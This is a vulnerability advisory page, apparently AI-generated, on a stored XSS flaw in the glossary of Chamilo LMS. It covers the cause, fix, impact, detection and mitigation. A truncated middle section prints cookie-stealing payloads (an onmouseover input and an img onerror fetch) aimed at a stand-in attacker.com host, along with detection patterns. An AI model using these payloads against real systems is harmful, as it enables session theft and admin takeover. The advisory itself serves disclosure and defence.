
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-52482 is a Stored Cross-Site Scripting (XSS) vulnerability in the glossary function of Chamilo LMS, a widely used open-source learning management system. It affects all versions prior to 1.11.30 (specifically confirmed through version 1.11.28), allowing users with the Teacher role to inject malicious JavaScript into glossary term entries that executes in the browser of any administrator who views the glossary. The vulnerability was discovered by researcher ElyseRuyssen during work at BZHunt and publicly disclosed on March 1–2, 2026. It carries a CVSS v3.1 base score of 8.3 (High) (GitHub Advisory, Feedly).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79). Specifically, the glossary function in /main/glossary/index.php failed to adequately sanitize the term parameter before storing it in the database; the stored payload is later rendered unsanitized in /main/tracking/course_log_resources.php when an administrator reviews course resources. The fix involved applying an attr_on_filter to text input fields in FormValidator.class.php and introducing a new RemoveOnAttributes HTML Purifier filter that strips on* event handler attributes from stored HTML, as well as replacing inline JavaScript-based delete confirmations with a modal dialog in glossary.lib.php (GitHub Commit 241c569, GitHub Commit 82cc07e, GitHub Commit f915007).
Successful exploitation allows a Teacher-role attacker to execute arbitrary JavaScript in the browser context of an administrator who views the affected glossary. This can result in session hijacking (theft of admin session cookies), credential harvesting, unauthorized administrative actions (e.g., creating new admin accounts, modifying platform settings), and exposure of sensitive data accessible to administrators. The scope change in the CVSS score reflects that the impact crosses from the teacher's security context into the administrator's, with high confidentiality and integrity impact (GitHub Advisory, Feedly).
A proof-of-concept reference is available via the GitHub Security Advisory (GHSA-4wcp-3rh3-7wm4), though no evidence of active in-the-wild exploitation has been reported as of the time of disclosure. Exploitation requires the attacker to already hold a Teacher-role account on the target Chamilo instance and requires an administrator to interact with the glossary (user interaction required). The EPSS score is approximately 0.038%, indicating a low current probability of exploitation in the wild. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory, Feedly).
/main/glossary/index.php.<input onmouseover="document.location='https://attacker.com/steal?c='+document.cookie" value="HoverMe"> or a simpler <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)> to exfiltrate the administrator's session cookie./main/tracking/course_log_resources.php, triggering the script in the admin's browser context./main/glossary/index.php containing HTML event handler patterns (e.g., on\w+=, onerror=, onmouseover=) in the term parameter; access log entries for /main/tracking/course_log_resources.php from administrator accounts shortly after suspicious glossary entries were created.<script>, onerror=, onload=, fetch(, document.cookie) in the name or description fields of the glossary table.Upgrade Chamilo LMS to version 1.11.30 or later, which addresses this vulnerability by applying on* attribute filtering via a new RemoveOnAttributes HTML Purifier filter and adding the attr_on_filter to text input fields (GitHub Release v1.11.30, GitHub Advisory). For systems that cannot be immediately patched, consider restricting access to the glossary function for Teacher-role users via network controls or application-level permissions, and limit administrator access to trusted networks only. Additionally, audit existing glossary entries for suspicious JavaScript payloads and monitor teacher accounts for unusual activity.
The vulnerability was reported by researcher ElyseRuyssen, credited in the official GitHub Security Advisory, who discovered it during work at BZHunt. The disclosure received moderate community attention, with mentions on Mastodon, Bluesky, and CVE tracking feeds shortly after publication in early March 2026. No major vendor statements beyond the Chamilo project's own advisory and patch release have been identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."